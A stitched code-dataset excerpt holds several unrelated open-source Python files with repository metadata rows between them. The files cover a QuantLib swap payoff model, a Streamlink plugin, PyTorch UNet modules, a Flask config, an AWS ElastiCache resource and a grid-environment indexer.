# first we need to puzzle out the dates for the index
projIndex = ql.as_iborindex(cp.index())
fixingDate = cp.fixingDate()
startDate = projIndex.valueDate(fixingDate)
endDate = projIndex.maturityDate(startDate)
#print(index, fixingDate, startDate, endDate)
tau = projIndex.dayCounter().yearFraction(startDate,endDate)
tenorBasis = 1.0 # default
if discYtsH is not None:
# we apply deterministic basis calculation
dfProj = 1.0 + tau*projIndex.fixing(fixingDate)
discIndex = projIndex.clone(discYtsH)
dfDisc = 1.0 + tau*discIndex.fixing(fixingDate)
tenorBasis = dfProj / dfDisc
#print(tenorBasis)
fixingTime = dc.yearFraction(today,fixingDate)
startTime = dc.yearFraction(today,startDate)
endTime = dc.yearFraction(today,endDate)
# fixed Libor or Libor forward rate
L = LiborRate(min(fixingTime,obsTime),startTime,endTime,tau,tenorBasis,currencyAlias)
if cp.spread()!=0.0:
L = L + cp.spread()
# we treat deterministic factors separately to avoid unneccessary multiplications
cpFactor = cp.nominal() * cp.accrualPeriod()
else:
L = 1.0 # used as pseudo-rate here
cpFactor = cf.amount() # treat it as a fixed cash flow
#
payTime = dc.yearFraction(today,cf.date())
cashFlow = payOrReceive * cpFactor * L * ZeroBond(obsTime,payTime,currencyAlias)
if currencyAlias is not None:
cashFlow = Asset(obsTime,currencyAlias) * cashFlow
#
return cashFlow @ obsTime
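# A small numeric sketch of the deterministic tenor-basis adjustment above
# (inputs are hypothetical, not from the original source): with tau = 0.5,
# a projected fixing of 2% and a discounting fixing of 1.8%,
#   dfProj = 1 + 0.5 * 0.020 = 1.010
#   dfDisc = 1 + 0.5 * 0.018 = 1.009
#   tenorBasis = 1.010 / 1.009 ~ 1.00099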
class Swap(Product):
# Python constructor
def __init__(self, qlLegs, payOrRecs, discYtsHs=None, currencyAliases=None):
self.qlLegs = qlLegs # a list of Legs
self.payOrRecs = payOrRecs # a list of Payer (-1) or Receiver (+1) flags
# we need to normalise optional inputs
if type(discYtsHs)==list:
self.discYtsHs = discYtsHs
else:
self.discYtsHs = [ discYtsHs for l in self.qlLegs ]
if type(currencyAliases)==list:
self.currencyAliases = currencyAliases
else:
self.currencyAliases = [ currencyAliases for l in self.qlLegs ]
def cashFlows(self, obsTime):
# we calculate times relative to global evaluation date
# this is a bit dangerous if someone changes evaluation date
today = ql.Settings.instance().getEvaluationDate()
# model time is measured via Act/365 (Fixed)
dc = ql.Actual365Fixed()
        # iterate over all legs (typically two for a swap) and collect future cash flows
cfs = []
for leg, por, discYtsH, alias in zip(self.qlLegs, self.payOrRecs,self.discYtsHs,self.currencyAliases):
for cf in leg:
payTime = dc.yearFraction(today,cf.date())
if payTime>obsTime: # only consider future cash flows
#print('%s: %f, %f' % (cf.date(),cf.amount(),payTime))
p = DiscountedPayoffFromCashFlow(cf,obsTime,por,discYtsH,alias)
cfs.append(p)
# print(p)
return cfs
def PayoffFromCashFlow(cf, payOrReceive, discYtsH=None):
# this is a bit dangerous if someone changes evaluation date
today = ql.Settings.instance().getEvaluationDate()
# model time is measured via Act/365 (Fixed)
dc = ql.Actual365Fixed()
#
payTime = dc.yearFraction(today,cf.date())
# first we try fixed rate cash flow
cp = ql.as_fixed_rate_coupon(cf)
if cp is not None:
return Fixed(payOrReceive*cp.amount()) @ payTime
# second try a libor coupon
cp = ql.as_floating_rate_coupon(cf)
if cp is not None:
# first we need to puzzle out the dates for the index
projIndex = ql.as_iborindex(cp.index())
fixingDate = cp.fixingDate()
startDate = projIndex.valueDate(fixingDate)
endDate = projIndex.maturityDate(startDate)
#print(index, fixingDate, startDate, endDate)
tau = projIndex.dayCounter().yearFraction(startDate,endDate)
tenorBasis = 1.0 # default
if discYtsH is not None:
# we apply deterministic basis calculation
dfProj = 1.0 + tau*projIndex.fixing(fixingDate)
discIndex = projIndex.clone(discYtsH)
dfDisc = 1.0 + tau*discIndex.fixing(fixingDate)
tenorBasis = dfProj / dfDisc
#print(tenorBasis)
fixingTime = dc.yearFraction(today,fixingDate)
startTime = dc.yearFraction(today,startDate)
endTime = dc.yearFraction(today,endDate)
# fixed Libor or Libor forward rate
L = LiborRate(fixingTime,startTime,endTime,tau,tenorBasis)
factor = payOrReceive * cp.nominal() * cp.accrualPeriod()
return ( factor * (L + cp.spread()) ) @ payTime
return None
class AmcSwap(Product):
# Python constructor, only single-currency
def __init__(self, qlLegs, payOrRecs, mcSim, maxDegree=2, discYtsH=None):
self.qlLegs = qlLegs # a list of Legs
self.payOrRecs = payOrRecs # a list of Payer (-1) or Receiver (+1) flags
self.mcSim = mcSim
self.maxDegree = maxDegree
self.discYtsH = discYtsH
# we want to re-use payoffs
today = ql.Settings.instance().getEvaluationDate()
# model time is measured via Act/365 (Fixed)
dc = ql.Actual365Fixed()
self.cfs = []
for leg, por in zip(self.qlLegs, self.payOrRecs):
for cf in leg:
payTime = dc.yearFraction(today,cf.date())
if payTime>0.0: # only consider future cash flows
p = PayoffFromCashFlow(cf,por,self.discYtsH)
self.cfs.append(Cache(p)) # this is the magic
def cashFlows(self, obsTime):
cfs = []
for cf in self.cfs:
if cf.obsTime>obsTime:
cfs.append(cf)
# we use a 'co-terminal' Libor rate as observable
tMax = max([ cf.obsTime for cf in self.cfs ])
L = LiborRate(obsTime,obsTime,tMax)
p = AmcSum(obsTime,cfs,[L],self.mcSim,self.maxDegree)
return [ p ]
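# Note on the regression variable above: AmcSum conditions the remaining cash
# flows on a single 'co-terminal' Libor observable spanning obsTime to the
# latest cash-flow observation time tMax, fitted with a polynomial basis of
# degree maxDegree (default 2).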
| 43.06875
| 110
| 0.628646
| 2,860
| 0.415034
| 0
| 0
| 0
| 0
| 0
| 0
| 1,565
| 0.227108
|
0b6dc7197643d4c8de27269ff87d6ea19785b867
| 1,571
|
py
|
Python
|
src/streamlink/plugins/tamago.py
|
hymer-up/streamlink
|
f09bf6e04cddc78eceb9ded655f716ef3ee4b84f
|
[
"BSD-2-Clause"
] | 5
|
2019-07-26T17:03:26.000Z
|
2020-10-17T23:23:43.000Z
|
src/streamlink/plugins/tamago.py
|
hymer-up/streamlink
|
f09bf6e04cddc78eceb9ded655f716ef3ee4b84f
|
[
"BSD-2-Clause"
] | 9
|
2018-01-14T15:20:23.000Z
|
2021-03-08T20:29:51.000Z
|
src/streamlink/plugins/tamago.py
|
bumplzz69/streamlink
|
34abc43875d7663ebafa241573dece272e93d88b
|
[
"BSD-2-Clause"
] | 4
|
2018-01-14T13:27:25.000Z
|
2021-11-15T22:28:30.000Z
|
import re
from streamlink.plugin import Plugin
from streamlink.plugin.api import validate
from streamlink.stream import HTTPStream
from streamlink import NoStreamsError
class Tamago(Plugin):
_url_re = re.compile(r"https?://(?:player\.)?tamago\.live/w/(?P<id>\d+)")
_api_url_base = "https://player.tamago.live/api/rooms/{id}"
_api_response_schema = validate.Schema({
u"status": 200,
u"message": u"Success",
u"data": {
u"room_number": validate.text,
u"stream": {validate.text: validate.url()}
}
})
_stream_qualities = {
u"150": "144p",
u"350": "360p",
u"550": "540p",
u"900": "720p",
}
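    # The keys above are the raw stream identifiers returned by the API;
    # anything not listed falls through to "720p+" in _get_streams below.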
@classmethod
def can_handle_url(cls, url):
return cls._url_re.match(url) is not None
def _get_streams(self):
user_id = self._url_re.match(self.url).group('id')
try:
api_response = self.session.http.get(self._api_url_base.format(id=user_id))
streams = self.session.http.json(api_response, schema=self._api_response_schema)['data']['stream']
except Exception:
raise NoStreamsError(self.url)
unique_stream_urls = []
        for stream in streams:
            if streams[stream] not in unique_stream_urls:
                unique_stream_urls.append(streams[stream])
                quality = self._stream_qualities.get(stream, "720p+")
                yield quality, HTTPStream(self.session, streams[stream])
__plugin__ = Tamago
| 29.641509
| 112
| 0.623806
| 1,376
| 0.875875
| 738
| 0.469764
| 96
| 0.061108
| 0
| 0
| 226
| 0.143857
|
0b6e713eceaaae29df8407fca294483723c28e41
| 17,811
|
py
|
Python
|
models/misc/modules.py
|
zgjslc/Film-Recovery-master1
|
4497a9930398c9e826ac364056a79e5bcbf6c953
|
[
"Apache-2.0"
] | null | null | null |
models/misc/modules.py
|
zgjslc/Film-Recovery-master1
|
4497a9930398c9e826ac364056a79e5bcbf6c953
|
[
"Apache-2.0"
] | null | null | null |
models/misc/modules.py
|
zgjslc/Film-Recovery-master1
|
4497a9930398c9e826ac364056a79e5bcbf6c953
|
[
"Apache-2.0"
] | null | null | null |
"""
Name: modules.py
Desc: This script defines some base module for building networks.
"""
import torch
import torch.nn as nn
import torch.nn.functional as F
class UNet_down_block(nn.Module):
def __init__(self, input_channel, output_channel, down_size=True):
super(UNet_down_block, self).__init__()
self.conv1 = nn.Conv2d(input_channel, output_channel, 3, padding=1)
self.bn1 = nn.GroupNorm(8, output_channel)
self.conv2 = nn.Conv2d(output_channel, output_channel, 3, padding=1)
self.bn2 = nn.GroupNorm(8, output_channel)
self.conv3 = nn.Conv2d(output_channel, output_channel, 3, padding=1)
self.bn3 = nn.GroupNorm(8, output_channel)
self.max_pool = nn.MaxPool2d(2, 2)
self.relu = nn.ReLU()
self.down_size = down_size
def forward(self, x):
x = self.relu(self.bn1(self.conv1(x)))
x = self.relu(self.bn2(self.conv2(x)))
x = self.relu(self.bn3(self.conv3(x)))
if self.down_size:
x = self.max_pool(x)
return x
class UNet_up_block(nn.Module):
def __init__(self, prev_channel, input_channel, output_channel, up_sample=True):
super(UNet_up_block, self).__init__()
self.up_sampling = nn.Upsample(scale_factor=2, mode='bilinear', align_corners=False)
self.conv1 = nn.Conv2d(prev_channel + input_channel, output_channel, 3, padding=1)
self.bn1 = nn.GroupNorm(8, output_channel)
self.conv2 = nn.Conv2d(output_channel, output_channel, 3, padding=1)
self.bn2 = nn.GroupNorm(8, output_channel)
self.conv3 = nn.Conv2d(output_channel, output_channel, 3, padding=1)
self.bn3 = nn.GroupNorm(8, output_channel)
self.relu = torch.nn.ReLU()
self.up_sample = up_sample
def forward(self, prev_feature_map, x):
if self.up_sample:
x = self.up_sampling(x)
x = torch.cat((x, prev_feature_map), dim=1)
x = self.relu(self.bn1(self.conv1(x)))
x = self.relu(self.bn2(self.conv2(x)))
x = self.relu(self.bn3(self.conv3(x)))
return x
class UNet(nn.Module):
def __init__(self, downsample=6, in_channels=3, out_channels=3):
super(UNet, self).__init__()
self.in_channels, self.out_channels, self.downsample = in_channels, out_channels, downsample
self.down1 = UNet_down_block(in_channels, 16, False)
self.down_blocks = nn.ModuleList(
[UNet_down_block(2**(4+i), 2**(5+i), True) for i in range(0, downsample)]
)
bottleneck = 2**(4 + downsample)
self.mid_conv1 = nn.Conv2d(bottleneck, bottleneck, 3, padding=1)
self.bn1 = nn.GroupNorm(8, bottleneck)
self.mid_conv2 = nn.Conv2d(bottleneck, bottleneck, 3, padding=1)
self.bn2 = nn.GroupNorm(8, bottleneck)
self.mid_conv3 = torch.nn.Conv2d(bottleneck, bottleneck, 3, padding=1)
self.bn3 = nn.GroupNorm(8, bottleneck)
self.up_blocks = nn.ModuleList(
[UNet_up_block(2**(4+i), 2**(5+i), 2**(4+i)) for i in range(0, downsample)]
)
self.last_conv1 = nn.Conv2d(16, 16, 3, padding=1)
self.last_bn = nn.GroupNorm(8, 16)
self.last_conv2 = nn.Conv2d(16, out_channels, 1, padding=0)
self.relu = nn.ReLU()
def forward(self, x):
x = self.down1(x)
xvals = [x]
for i in range(0, self.downsample):
x = self.down_blocks[i](x)
xvals.append(x)
x = self.relu(self.bn1(self.mid_conv1(x)))
x = self.relu(self.bn2(self.mid_conv2(x)))
x = self.relu(self.bn3(self.mid_conv3(x)))
for i in range(0, self.downsample)[::-1]:
x = self.up_blocks[i](xvals[i], x)
x = self.relu(self.last_bn(self.last_conv1(x)))
x = self.relu(self.last_conv2(x))
#x = self.last_conv2(x)
return x
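# Channel-width sketch for the default UNet(downsample=6, in_channels=3):
# the stem maps 3 -> 16, each down block doubles the width
# (16 -> 32 -> 64 -> 128 -> 256 -> 512 -> 1024), the three mid convs stay at
# the 2**(4 + downsample) = 1024 bottleneck, and the up blocks mirror the
# widths back down to 16 before the final 1x1 output convolution.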
'''
class UNetDepth(nn.Module):
def __init__(self):
super(UNetDepth, self).__init__()
self.down_block1 = UNet_down_block(3, 16, False)
self.down_block2 = UNet_down_block(16, 32, True)
self.down_block3 = UNet_down_block(32, 64, True)
self.down_block4 = UNet_down_block(64, 128, True)
self.down_block5 = UNet_down_block(128, 256, True)
self.down_block6 = UNet_down_block(256, 512, True)
self.down_block7 = UNet_down_block(512, 1024, False)
self.mid_conv1 = nn.Conv2d(1024, 1024, 3, padding=1)
self.bn1 = nn.GroupNorm(8, 1024)
self.mid_conv2 = nn.Conv2d(1024, 1024, 3, padding=1)
self.bn2 = nn.GroupNorm(8, 1024)
self.mid_conv3 = torch.nn.Conv2d(1024, 1024, 3, padding=1)
self.bn3 = torch.nn.GroupNorm(8, 1024)
self.up_block1 = UNet_up_block(512, 1024, 512, False)
self.up_block2 = UNet_up_block(256, 512, 256, True)
self.up_block3 = UNet_up_block(128, 256, 128, True)
self.up_block4 = UNet_up_block(64, 128, 64, True)
self.up_block5 = UNet_up_block(32, 64, 32, True)
self.up_block6 = UNet_up_block(16, 32, 16, True)
self.last_conv1 = nn.Conv2d(16, 16, 3, padding=1)
self.last_bn = nn.GroupNorm(8, 16)
self.last_conv2 = nn.Conv2d(16, 1, 1, padding=0)
self.relu = nn.ReLU()
def forward(self, x):
x = self.x1 = self.down_block1(x)
x = self.x2 = self.down_block2(self.x1)
x = self.x3 = self.down_block3(self.x2)
x = self.x4 = self.down_block4(self.x3)
x = self.x5 = self.down_block5(self.x4)
x = self.x6 = self.down_block6(self.x5)
x = self.x7 = self.down_block7(self.x6)
x = self.relu(self.bn1(self.mid_conv1(x)))
x = self.relu(self.bn2(self.mid_conv2(x)))
x = self.relu(self.bn3(self.mid_conv3(x)))
x = self.up_block1(self.x6, x)
x = self.up_block2(self.x5, x)
x = self.up_block3(self.x4, x)
x = self.up_block4(self.x3, x)
x = self.up_block5(self.x2, x)
x = self.up_block6(self.x1, x)
x = self.relu(self.last_bn(self.last_conv1(x)))
x = self.last_conv2(x)
return x
'''
class UNetDepth(nn.Module):
def __init__(self):
super(UNetDepth, self).__init__()
self.down_block1 = UNet_down_block(3, 16, False)
self.down_block2 = UNet_down_block(16, 32, True)
self.down_block3 = UNet_down_block(32, 64, True)
self.down_block4 = UNet_down_block(64, 128, True)
self.down_block5 = UNet_down_block(128, 256, True)
self.down_block6 = UNet_down_block(256, 512, False)
self.mid_conv1 = nn.Conv2d(512, 512, 3, padding=1)
self.bn1 = nn.GroupNorm(8, 512)
self.mid_conv2 = nn.Conv2d(512, 512, 3, padding=1)
self.bn2 = nn.GroupNorm(8, 512)
self.mid_conv3 = torch.nn.Conv2d(512, 512, 3, padding=1)
self.bn3 = torch.nn.GroupNorm(8, 512)
self.up_block1 = UNet_up_block(256, 512, 256, False)
self.up_block2 = UNet_up_block(128, 256, 128, True)
self.up_block3 = UNet_up_block(64, 128, 64, True)
self.up_block4 = UNet_up_block(32, 64, 32, True)
self.up_block5 = UNet_up_block(16, 32, 16, True)
self.last_conv1 = nn.Conv2d(16, 16, 3, padding=1)
self.last_bn = nn.GroupNorm(8, 16)
self.last_conv2 = nn.Conv2d(16, 1, 1, padding=0)
self.relu = nn.ReLU()
def forward(self, x):
x = self.x1 = self.down_block1(x)
x = self.x2 = self.down_block2(self.x1)
x = self.x3 = self.down_block3(self.x2)
x = self.x4 = self.down_block4(self.x3)
x = self.x5 = self.down_block5(self.x4)
x = self.x6 = self.down_block6(self.x5)
x = self.relu(self.bn1(self.mid_conv1(x)))
x = self.relu(self.bn2(self.mid_conv2(x)))
x = self.relu(self.bn3(self.mid_conv3(x)))
x = self.up_block1(self.x5, x)
x = self.up_block2(self.x4, x)
x = self.up_block3(self.x3, x)
x = self.up_block4(self.x2, x)
x = self.up_block5(self.x1, x)
x = self.relu(self.last_bn(self.last_conv1(x)))
x = self.last_conv2(x)
return x
class UNet_sim(nn.Module):
def __init__(self, downsample=4, in_channels=3, out_channels=3):
super(UNet_sim, self).__init__()
self.downsample, self.in_channels, self.out_channels = downsample, in_channels, out_channels
self.conv = ConvBlock(in_channels, 64)
self.down_blocks = nn.ModuleList(
[UNet_down_block(2 ** (6 + i), 2 ** (7 + i), True) for i in range(0, downsample)]
)
bottleneck = 2 ** (6 + downsample)
self.mid_conv1 = nn.Conv2d(bottleneck, bottleneck, 3, padding=1)
self.bn1 = nn.GroupNorm(8, bottleneck)
self.mid_conv2 = nn.Conv2d(bottleneck, bottleneck, 3, padding=1)
self.bn2 = nn.GroupNorm(8, bottleneck)
self.mid_conv3 = torch.nn.Conv2d(bottleneck, bottleneck, 3, padding=1)
self.bn3 = nn.GroupNorm(8, bottleneck)
self.up_blocks = nn.ModuleList(
[UNet_up_block(2 ** (6 + i), 2 ** (7 + i), 2 ** (6 + i)) for i in range(0, downsample)]
)
self.last_conv1 = nn.Conv2d(64, 64, 3, padding=1)
self.last_bn = nn.GroupNorm(8, 64)
self.last_conv2 = nn.Conv2d(64, out_channels, 1, padding=0)
self.relu = nn.ReLU()
def forward(self, x):
x = self.conv(x)
xvals = [x]
for i in range(0, self.downsample):
x = self.down_blocks[i](x)
xvals.append(x)
x = self.relu(self.bn1(self.mid_conv1(x)))
x = self.relu(self.bn2(self.mid_conv2(x)))
x = self.relu(self.bn3(self.mid_conv3(x)))
for i in range(0, self.downsample)[::-1]:
x = self.up_blocks[i](xvals[i], x)
x = self.last_bn(self.last_conv1(x))
x = self.last_conv2(x)
return x
class Encoder(nn.Module):
def __init__(self, downsample=6, in_channels=3):
""":downsample the number of down blocks
:in_channels the channel of input tensor
"""
super(Encoder, self).__init__()
self.in_channels, self.downsample = in_channels, downsample
self.down1 = UNet_down_block(in_channels, 16, False)
self.down_blocks = nn.ModuleList(
[UNet_down_block(2 ** (4 + i), 2 ** (5 + i), True) for i in range(0, downsample)]
)
bottleneck = 2 ** (4 + downsample)
self.mid_conv1 = nn.Conv2d(bottleneck, bottleneck, 3, padding=1)
self.bn1 = nn.GroupNorm(8, bottleneck)
self.mid_conv2 = nn.Conv2d(bottleneck, bottleneck, 3, padding=1)
self.bn2 = nn.GroupNorm(8, bottleneck)
self.mid_conv3 = torch.nn.Conv2d(bottleneck, bottleneck, 3, padding=1)
self.bn3 = nn.GroupNorm(8, bottleneck)
self.relu = nn.ReLU()
def forward(self, x):
x = self.down1(x)
xvals = [x]
for i in range(0, self.downsample):
x = self.down_blocks[i](x)
xvals.append(x)
x = self.relu(self.bn1(self.mid_conv1(x)))
x = self.relu(self.bn2(self.mid_conv2(x)))
x = self.relu(self.bn3(self.mid_conv3(x)))
return xvals, x
class Decoder(nn.Module):
def __init__(self, downsample, out_channels, combine_num=0):
super(Decoder, self).__init__()
self.out_channels, self.downsample = out_channels, downsample
self.combine_num = combine_num
self.up_blocks = nn.ModuleList(
[UNet_up_block(2 ** (4 + i), 2 ** (5 + i), 2 ** (4 + i)) for i in range(0, self.downsample)])
self.last_conv1 = nn.Conv2d(16, 16, 3, padding=1)
self.last_bn = nn.GroupNorm(8, 16)
self.last_conv2 = nn.Conv2d(16, self.out_channels, 1, padding=0)
self.up_sampling = nn.Upsample(scale_factor=2, mode='bilinear', align_corners=False)
self.relu = nn.ReLU()
def forward(self, xvals, x):
devals = []
for i in range(0, self.downsample)[::-1]:
x = self.up_blocks[i](xvals[i], x)
if i < self.combine_num:
devals.append(x)
        y = self.last_bn(self.last_conv1(x))
        y = self.last_conv2(y)
if len(devals) > 0:
for j, decode in enumerate(devals):
for _ in range(len(devals) - 1 - j):
decode = self.up_sampling(decode)
devals[j] = decode
combine_x = torch.cat(devals[::-1], dim=1)
return y, combine_x
else:
return y, x
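# When combine_num > 0, the last combine_num decoder activations are upsampled
# to a common resolution and concatenated along the channel axis, so a
# downstream head can consume multi-scale features alongside the prediction y.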
class Encoder_sim(nn.Module):
def __init__(self, downsample=4, in_channels=3):
super(Encoder_sim, self).__init__()
self.downsample = downsample
self.conv = ConvBlock(in_channels, 64)
self.down_blocks = nn.ModuleList(
[UNet_down_block(2 ** (6 + i), 2 ** (7 + i), True) for i in range(0, downsample)]
)
bottleneck = 2 ** (6 + self.downsample)
self.mid_conv1 = nn.Conv2d(bottleneck, bottleneck, 3, padding=1)
self.bn1 = nn.GroupNorm(8, bottleneck)
self.mid_conv2 = nn.Conv2d(bottleneck, bottleneck, 3, padding=1)
self.bn2 = nn.GroupNorm(8, bottleneck)
self.mid_conv3 = torch.nn.Conv2d(bottleneck, bottleneck, 3, padding=1)
self.bn3 = nn.GroupNorm(8, bottleneck)
self.relu = nn.ReLU()
def forward(self, x):
x = self.conv(x)
xvals = [x]
for i in range(0, self.downsample):
x = self.down_blocks[i](x)
xvals.append(x)
x = self.relu(self.bn1(self.mid_conv1(x)))
x = self.relu(self.bn2(self.mid_conv2(x)))
x = self.relu(self.bn3(self.mid_conv3(x)))
return xvals, x
class Decoder_sim(nn.Module):
def __init__(self, downsample, out_channels):
super(Decoder_sim, self).__init__()
self.downsample, self.out_channels = downsample, out_channels
self.up_blocks = nn.ModuleList(
[UNet_up_block(2 ** (6 + i), 2 ** (7 + i), 2 ** (6 + i)) for i in range(0, self.downsample)]
)
self.last_conv1 = nn.Conv2d(64, 64, 3, padding=1)
self.last_bn = nn.GroupNorm(8, 64)
self.last_conv2 = nn.Conv2d(64, self.out_channels, 1, padding=0)
self.relu = nn.ReLU()
def forward(self, xvals, x):
for i in range(0, self.downsample)[::-1]:
x = self.up_blocks[i](xvals[i], x)
y = self.last_bn(self.last_conv1(x))
y = self.last_conv2(y)
return y, x
class ThreeD2NorDepth(nn.Module):
def __init__(self, downsample=3, use_simple=True):
super(ThreeD2NorDepth, self).__init__()
if use_simple:
self.threeD_encoder = Encoder_sim(downsample=downsample, in_channels=3)
self.normal_decoder = Decoder_sim(downsample=downsample, out_channels=3)
self.depth_decoder = Decoder_sim(downsample=downsample, out_channels=1)
else:
self.threeD_encoder = Encoder(downsample=downsample, in_channels=3)
self.normal_decoder = Decoder(downsample=downsample, out_channels=3, combine_num=0)
self.depth_decoder = Decoder(downsample=downsample, out_channels=1, combine_num=0)
def forward(self, x):
xvals, x = self.threeD_encoder(x)
nor, _ = self.normal_decoder(xvals, x)
dep, _ = self.depth_decoder(xvals, x)
return nor, dep
class AlbedoDecoder_sim(nn.Module):
def __init__(self, downsample=6, out_channels=1):
super(AlbedoDecoder_sim, self).__init__()
self.out_channels, self.downsample = out_channels, downsample
self.up_blocks = nn.ModuleList(
[UNet_up_block(2 ** (7 + i), 2 ** (8 + i), 2 ** (7 + i)) for i in range(0, self.downsample)])
self.last_conv1 = nn.Conv2d(128, 64, 3, padding=1)
self.last_bn = nn.GroupNorm(8, 64)
self.last_conv2 = nn.Conv2d(64, self.out_channels, 1, padding=0)
self.relu = nn.ReLU()
def forward(self, xvals, x):
for i in range(0, self.downsample)[::-1]:
x = self.up_blocks[i](xvals[i], x)
y = self.last_bn(self.last_conv1(x))
y = self.last_conv2(y)
return y, x
class AlbedoDecoder(nn.Module):
def __init__(self, downsample=6, out_channels=1):
super(AlbedoDecoder, self).__init__()
self.out_channels, self.downsample = out_channels, downsample
self.up_blocks = nn.ModuleList(
[UNet_up_block(2 ** (5 + i), 2 ** (6 + i), 2 ** (5 + i)) for i in range(0, self.downsample)])
self.last_conv1 = nn.Conv2d(32, 32, 3, padding=1)
self.last_bn = nn.GroupNorm(8, 32)
self.last_conv2 = nn.Conv2d(32, self.out_channels, 1, padding=0)
self.relu = nn.ReLU()
def forward(self, xvals, x):
for i in range(0, self.downsample)[::-1]:
x = self.up_blocks[i](xvals[i], x)
y = self.last_bn(self.last_conv1(x))
y = self.last_conv2(y)
return y, x
class ConvBlock(nn.Module):
def __init__(self, f1, f2, kernel_size=3, padding=1, use_groupnorm=False, groups=8, dilation=1, transpose=False):
super(ConvBlock, self).__init__()
self.transpose = transpose
self.conv = nn.Conv2d(f1, f2, (kernel_size, kernel_size), dilation=dilation, padding=padding*dilation)
if self.transpose:
self.convt = nn.ConvTranspose2d(
f1, f1, (3, 3), dilation=dilation, stride=2, padding=dilation, output_padding=1
)
if use_groupnorm:
self.bn = nn.GroupNorm(groups, f1)
else:
self.bn = nn.BatchNorm2d(f1)
def forward(self, x):
# x = F.dropout(x, 0.04, self.training)
x = self.bn(x)
if self.transpose:
# x = F.upsample(x, scale_factor=2, mode='bilinear')
x = F.relu(self.convt(x))
# x = x[:, :, :-1, :-1]
x = F.relu(self.conv(x))
return x
| 41.133949
| 117
| 0.60311
| 15,375
| 0.863231
| 0
| 0
| 0
| 0
| 0
| 0
| 2,574
| 0.144517
|
0b6eaa68175183e78cc2a72bb734ce612395335a
| 341
|
py
|
Python
|
flask_webpack_bundle/config.py
|
briancappello/flask-webpack-bundle
|
67896e6ade345e34721a8f9da156b65fc0646984
|
[
"MIT"
] | null | null | null |
flask_webpack_bundle/config.py
|
briancappello/flask-webpack-bundle
|
67896e6ade345e34721a8f9da156b65fc0646984
|
[
"MIT"
] | null | null | null |
flask_webpack_bundle/config.py
|
briancappello/flask-webpack-bundle
|
67896e6ade345e34721a8f9da156b65fc0646984
|
[
"MIT"
] | null | null | null |
import os
from flask_unchained import AppConfig
class Config(AppConfig):
WEBPACK_MANIFEST_PATH = os.path.join(
AppConfig.STATIC_FOLDER, 'assets', 'manifest.json')
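# Illustrative note (assuming the flask_unchained default STATIC_FOLDER of
# 'static'): WEBPACK_MANIFEST_PATH resolves to 'static/assets/manifest.json'.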
class ProdConfig:
# use relative paths by default, ie, the same host as the backend
WEBPACK_ASSETS_HOST = ''
class StagingConfig(ProdConfig):
pass
| 18.944444
| 69
| 0.730205
| 283
| 0.829912
| 0
| 0
| 0
| 0
| 0
| 0
| 90
| 0.26393
|
0b6fda84960a8cf5a23f750128dc700eaee71d2f
| 2,458
|
py
|
Python
|
touchdown/aws/elasticache/replication_group.py
|
yaybu/touchdown
|
70ecda5191ce2d095bc074dcb23bfa1584464814
|
[
"Apache-2.0"
] | 14
|
2015-01-05T18:18:04.000Z
|
2022-02-07T19:35:12.000Z
|
touchdown/aws/elasticache/replication_group.py
|
yaybu/touchdown
|
70ecda5191ce2d095bc074dcb23bfa1584464814
|
[
"Apache-2.0"
] | 106
|
2015-01-06T00:17:13.000Z
|
2019-09-07T00:35:32.000Z
|
touchdown/aws/elasticache/replication_group.py
|
yaybu/touchdown
|
70ecda5191ce2d095bc074dcb23bfa1584464814
|
[
"Apache-2.0"
] | 5
|
2015-01-30T10:18:24.000Z
|
2022-02-07T19:35:13.000Z
|
# Copyright 2014 Isotoma Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from touchdown.core import argument, output, serializers
from touchdown.core.plan import Plan
from ..common import SimpleApply, SimpleDescribe, SimpleDestroy
from .cache import BaseCacheCluster
class ReplicationGroup(BaseCacheCluster):
resource_name = "replication_group"
name = argument.String(
max=16, regex=r"[a-z1-9\-]{1,20}", field="ReplicationGroupId"
)
description = argument.String(
default=lambda resource: resource.name, field="ReplicationGroupDescription"
)
primary_cluster = argument.Resource(
"touchdown.aws.elasticache.cache.CacheCluster", field="PrimaryClusterId"
)
automatic_failover = argument.Boolean(field="AutomaticFailoverEnabled")
num_cache_clusters = argument.Integer(field="NumCacheClusters", update=False)
endpoint_address = output.Output(
serializers.Property("NodeGroups[0].PrimaryEndpoint.Address")
)
endpoint_port = output.Output(
serializers.Property("NodeGroups[0].PrimaryEndpoint.Port")
)
class Describe(SimpleDescribe, Plan):
resource = ReplicationGroup
service_name = "elasticache"
api_version = "2015-02-02"
describe_action = "describe_replication_groups"
describe_envelope = "ReplicationGroups"
describe_notfound_exception = "ReplicationGroupNotFoundFault"
key = "ReplicationGroupId"
class Apply(SimpleApply, Describe):
create_action = "create_replication_group"
update_action = "modify_replication_group"
waiter = "replication_group_available"
class Destroy(SimpleDestroy, Describe):
destroy_action = "delete_replication_group"
waiter = "replication_group_deleted"
def get_destroy_serializer(self):
return serializers.Dict(
ReplicationGroupId=serializers.Identifier(),
RetainPrimaryCluster=True if self.resource.primary_cluster else False,
)
| 32.773333
| 83
| 0.746542
| 1,673
| 0.680635
| 0
| 0
| 0
| 0
| 0
| 0
| 1,092
| 0.444264
|
0b6ffbf766a563164a019a52f34be9e1263ae173
| 4,197
|
py
|
Python
|
core/env.py
|
ayyuriss/EigenFunctions
|
8cb6c22871fcddb633392c0a12691e960dad5143
|
[
"MIT"
] | null | null | null |
core/env.py
|
ayyuriss/EigenFunctions
|
8cb6c22871fcddb633392c0a12691e960dad5143
|
[
"MIT"
] | null | null | null |
core/env.py
|
ayyuriss/EigenFunctions
|
8cb6c22871fcddb633392c0a12691e960dad5143
|
[
"MIT"
] | null | null | null |
import xxhash
import numpy as np
from base.grid import SimpleGRID
import scipy.sparse as SP
h = xxhash.xxh64()
s_to_i = lambda x,size : size*x[0]+x[1]
i_to_s = lambda x,size : (x%size,x//size)
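# e.g. on a 5x5 grid, s_to_i((2, 3), 5) == 13 while i_to_s(13, 5) == (3, 2):
# as written, i_to_s returns (x % size, x // size), the component-swapped
# inverse of s_to_i, so callers must account for the flipped ordering.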
def hash(x):
h.reset()
h.update(x)
return h.digest()
class Indexer(object):
def __init__(self):
self.total = 0
self.dict = {}
def get(self,hs):
val = self.dict.get(hs,-1)
if val == -1:
val = self.total
self.dict[hs] = val
self.total += 1
return val
def reset(self):
self.__init__()
class HashIndexer(object):
def __init__(self):
self.total = 0
